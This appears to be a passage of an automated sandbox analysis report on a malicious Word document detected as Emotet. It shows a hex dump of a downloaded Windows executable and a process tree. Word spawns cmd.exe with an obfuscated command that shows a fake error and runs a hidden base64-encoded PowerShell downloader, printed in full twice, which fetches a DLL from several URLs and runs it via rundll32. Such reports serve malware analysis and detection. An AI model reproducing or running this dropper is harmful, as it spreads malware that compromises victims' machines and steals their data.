                                                      Connection: Keep-Alive
                                                      Transfer-Encoding: chunked
                                                      Content-Type: application/octet-stream
                                                      Data Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 86 46 0b 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 40 00 00 00 fa 04 00 00 00 00 00 50 19 00 00 00 10 00 00 00 50 00 00 00 00 00 10 00 10 00 00 00 02 00 00 03 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 18 c6 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 60 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c 05 00 58 15 00 00 00 a0 05 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 61 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 36 00 00 00 10 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 57 00 00 00 00 50 00 00 00 02 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 04 00 00 00 60 00 00 00 04 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 34 00 00 14 ed 04 00 00 70 00 00 00 ee 04 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 38 00 00 64 00 00 00 00 60 05 00 00 02 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 37 00 00 64 00 00 00 00 70 05 00 00 02 00 00 00 32 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 36 00 00 64 00 00 00 00 80 05 00 00 02 00 00 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 35 00 00 64 00 00 00 00 90 05 00 00 02 00 00 00 36 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 65 6c 6f 63 00 00 e0 03 00 00 00 a0 05 00 00 04 00 00 00 38 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$PELF`!2@PP`d<Xa`.text68 `.rdataWP<@@.data`>@.text4pB@.text8d`0 @.text7dp2 @.text6d4 @.text5d6 @.reloc8@B


                                                      Code Manipulations

                                                      Statistics

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Start time:19:55:34
                                                      Start date:26/01/2021
                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                      Imagebase:0x13f7c0000
                                                      File size:1424032 bytes
                                                      MD5 hash:95C38D04597050285A18F66039EDB456
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:19:55:36
                                                      Start date:26/01/2021
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACAAJwArACcAWwAgACcAKwAoACcAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACgAJwAvAGkAZQAtACcAKwAnAGIAJwArACcAZQAnACkAKwAoACcAcwAnACsAJwB0AC4AbgAnACkAKwAnAGUAJwArACgAJwB0AC8AbwAnACsAJwBuACcAKwAnAGwAaQBuACcAKQArACcAZQAnACsAKAAnAC0AJwArACcAdABpAG0AZQByACcAKwAnAC0AJwApACsAKAAnAGsAJwArACcAdgBoACcAKQArACgAJwB4AHoAJwArACcALwBpACcAKQArACcAbAAnACsAKAAnAFgAJwArACcATAAvACEAeAAnACkAKwAoACcAIABbACAAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBnACcAKwAoACcAbwBjACcAKwAnAHAAJwArACcAaABvAG4AJwApACsAKAAnAGcAdABoACcAKwAnAGUAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwB3AHAAJwArACcALQAnACkAKwAnAGMAbwAnACsAJwBuAHQAJwArACgAJwBlAG4AdAAvACcAKwAnAGwAJwApACsAJwBNACcAKwAoACcATQBDACcAKwAnAC8AIQAnACkAKwAoACcAeAAgACcAKwAnAFsAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8ALwAnACsAJwB3AHcAJwApACsAJwB3ACcAKwAoACcALgBsACcAKwAnAGUAJwApACsAKAAnAHQAJwArACcAcwBjACcAKQArACcAbwBtACcAKwAnAHAAYQAnACsAKAAnAHIAJwArACcAZQBvAG4AJwApACsAKAAnAGwAJwArACcAaQBuACcAKQArACgAJwBlACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AZAAnACsAJwBlACcAKQArACgAJwAuAGwAJwArACcAZQB0ACcAKQArACcAcwBjACcAKwAnAG8AbQAnACsAJwBwACcAKwAnAGEAJwArACcAcgBlACcAKwAnAG8AbgAnACsAKAAnAGwAaQAnACsAJwBuAGUAJwApACsAKAAnAC4AJwArACcAYwBvAG0AJwArACcALwB3AFkAZAAvACcAKwAnACEAeAAgACcAKQArACcAWwAnACsAKAAnACAAcwAnACsAJwBoACAAYgAnACsAJwA6AC8AJwApACsAJwAvACcAKwAnAGMAYQAnACsAJwBtAGIAJwArACcAaQAnACsAKAAnAGEAcwB1AGgAJwArACcAaQAnACkAKwAoACcAcwB0AG8AcgAnACsAJwBpAGEAJwArACcALgBnAHIAbwB3ACcAKQArACcAbAAnACsAJwBhAGIAJwArACgAJwAuACcAKwAnAGUAcwAvAHcAcAAnACsAJwAtACcAKQArACcAYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AJwArACcAdAAnACsAKAAnAC8AaAAnACsAJwBHAGgAWQAnACkAKwAnADIALwAnACkALgAiAHIAYABlAHAAYABMAEEAQwBlACIAKAAoACcAeAAgACcAKwAnAFsAJwArACgAJwAgAHMAaAAnACsAJwAgAGIAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAE0AcgBpAHEAZAA1ADkALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAcwBQAGwAYABpAHQAIgAoACQAQQA3ADYAQgAgACsAIAAkAEkAaAB2ADgAOQBfAGcAIAArACAAJABRADcAXwBSACkAOwAkAFYAOABfAEcAPQAoACgAJwBNACcAKwAnADUAMQAnACkAKwAnAFYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABYAGoAOABzADEANQAxACAAaQBuACAAJABLAHcAMwA3ADkANAB4ACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAFkAUwB0AEUAbQAuAG4ARQBUAC4AdwBFAEIAQwBMAEkAZQBuAFQAKQAuACIAZABPAGAAdwBuAGAATABPAGEARABmAGkAbABlACIAKAAkAFgAagA4AHMAMQA1ADEALAAgACQAQQBkADEAcgBhADgAbgApADsAJABEADkANABKAD0AKAAnAEIAJwArACgAJwAzACcAKwAnADIARwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABBAGQAMQByAGEAOABuACkALgAiAEwAYABFAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADMAMQAyADAAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAMwAnACsAJwAyACcAKQAgACQAQQBkADEAcgBhADgAbgAsACgAJwBBACcAKwAnAG4AeQAnACsAKAAnAFMAdAByACcAKwAnAGkAJwApACsAJwBuAGcAJwApAC4AIgB0AE8AUwBUAFIAYABpAG4ARwAiACgAKQA7ACQAVgA3ADgAQgA9ACgAJwBTACcAKwAoACcAOAA1ACcAKwAnAEIAJwApACkAOwBiAHIAZQBhAGsAOwAkAFYAOABfAFAAPQAoACcARgA2ACcAKwAnADcATAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAMAA0AFYAPQAoACcASQAyACcAKwAnADYAWgAnACkA
                                                      Imagebase:0x49d60000
                                                      File size:345088 bytes
                                                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      General

                                                      Start time:19:55:37
                                                      Start date:26/01/2021
                                                      Path:C:\Windows\System32\msg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:msg user /v Word experienced an error trying to open the file.
                                                      Imagebase:0xff4d0000
                                                      File size:26112 bytes
                                                      MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      General

                                                      Start time:19:55:37
                                                      Start date:26/01/2021
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACAAJwArACcAWwAgACcAKwAoACcAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACgAJwAvAGkAZQAtACcAKwAnAGIAJwArACcAZQAnACkAKwAoACcAcwAnACsAJwB0AC4AbgAnACkAKwAnAGUAJwArACgAJwB0AC8AbwAnACsAJwBuACcAKwAnAGwAaQBuACcAKQArACcAZQAnACsAKAAnAC0AJwArACcAdABpAG0AZQByACcAKwAnAC0AJwApACsAKAAnAGsAJwArACcAdgBoACcAKQArACgAJwB4AHoAJwArACcALwBpACcAKQArACcAbAAnACsAKAAnAFgAJwArACcATAAvACEAeAAnACkAKwAoACcAIABbACAAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBnACcAKwAoACcAbwBjACcAKwAnAHAAJwArACcAaABvAG4AJwApACsAKAAnAGcAdABoACcAKwAnAGUAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwB3AHAAJwArACcALQAnACkAKwAnAGMAbwAnACsAJwBuAHQAJwArACgAJwBlAG4AdAAvACcAKwAnAGwAJwApACsAJwBNACcAKwAoACcATQBDACcAKwAnAC8AIQAnACkAKwAoACcAeAAgACcAKwAnAFsAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8ALwAnACsAJwB3AHcAJwApACsAJwB3ACcAKwAoACcALgBsACcAKwAnAGUAJwApACsAKAAnAHQAJwArACcAcwBjACcAKQArACcAbwBtACcAKwAnAHAAYQAnACsAKAAnAHIAJwArACcAZQBvAG4AJwApACsAKAAnAGwAJwArACcAaQBuACcAKQArACgAJwBlACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AZAAnACsAJwBlACcAKQArACgAJwAuAGwAJwArACcAZQB0ACcAKQArACcAcwBjACcAKwAnAG8AbQAnACsAJwBwACcAKwAnAGEAJwArACcAcgBlACcAKwAnAG8AbgAnACsAKAAnAGwAaQAnACsAJwBuAGUAJwApACsAKAAnAC4AJwArACcAYwBvAG0AJwArACcALwB3AFkAZAAvACcAKwAnACEAeAAgACcAKQArACcAWwAnACsAKAAnACAAcwAnACsAJwBoACAAYgAnACsAJwA6AC8AJwApACsAJwAvACcAKwAnAGMAYQAnACsAJwBtAGIAJwArACcAaQAnACsAKAAnAGEAcwB1AGgAJwArACcAaQAnACkAKwAoACcAcwB0AG8AcgAnACsAJwBpAGEAJwArACcALgBnAHIAbwB3ACcAKQArACcAbAAnACsAJwBhAGIAJwArACgAJwAuACcAKwAnAGUAcwAvAHcAcAAnACsAJwAtACcAKQArACcAYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AJwArACcAdAAnACsAKAAnAC8AaAAnACsAJwBHAGgAWQAnACkAKwAnADIALwAnACkALgAiAHIAYABlAHAAYABMAEEAQwBlACIAKAAoACcAeAAgACcAKwAnAFsAJwArACgAJwAgAHMAaAAnACsAJwAgAGIAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAE0AcgBpAHEAZAA1ADkALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAcwBQAGwAYABpAHQAIgAoACQAQQA3ADYAQgAgACsAIAAkAEkAaAB2ADgAOQBfAGcAIAArACAAJABRADcAXwBSACkAOwAkAFYAOABfAEcAPQAoACgAJwBNACcAKwAnADUAMQAnACkAKwAnAFYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABYAGoAOABzADEANQAxACAAaQBuACAAJABLAHcAMwA3ADkANAB4ACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAFkAUwB0AEUAbQAuAG4ARQBUAC4AdwBFAEIAQwBMAEkAZQBuAFQAKQAuACIAZABPAGAAdwBuAGAATABPAGEARABmAGkAbABlACIAKAAkAFgAagA4AHMAMQA1ADEALAAgACQAQQBkADEAcgBhADgAbgApADsAJABEADkANABKAD0AKAAnAEIAJwArACgAJwAzACcAKwAnADIARwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABBAGQAMQByAGEAOABuACkALgAiAEwAYABFAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADMAMQAyADAAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAMwAnACsAJwAyACcAKQAgACQAQQBkADEAcgBhADgAbgAsACgAJwBBACcAKwAnAG4AeQAnACsAKAAnAFMAdAByACcAKwAnAGkAJwApACsAJwBuAGcAJwApAC4AIgB0AE8AUwBUAFIAYABpAG4ARwAiACgAKQA7ACQAVgA3ADgAQgA9ACgAJwBTACcAKwAoACcAOAA1ACcAKwAnAEIAJwApACkAOwBiAHIAZQBhAGsAOwAkAFYAOABfAFAAPQAoACcARgA2ACcAKwAnADcATAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAMAA0AFYAPQAoACcASQAyACcAKwAnADYAWgAnACkA
                                                      Imagebase:0x13f280000
                                                      File size:473600 bytes
                                                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      General

                                                      Start time:19:55:42
                                                      Start date:26/01/2021
                                                      Path:C:\Windows\System32\rundll32.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
                                                      Imagebase:0xffe10000
                                                      File size:45568 bytes
                                                      MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      General

                                                      Start time:19:55:43
                                                      Start date:26/01/2021
                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
                                                      Imagebase:0xa70000
                                                      File size:44544 bytes
                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2102076691.0000000000170000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2102719700.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2102091974.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                                      Reputation:moderate

                                                      General

                                                      Start time:19:55:47
                                                      Start date:26/01/2021
                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1
                                                      Imagebase:0xa70000
                                                      File size:44544 bytes
                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2114421803.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2117996445.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2114399878.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                                      Reputation:moderate

                                                      General

                                                      Start time:19:55:53
                                                      Start date:26/01/2021
                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',NRUAmATPeNJ
                                                      Imagebase:0xa70000
                                                      File size:44544 bytes
                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2125204739.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2128583729.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
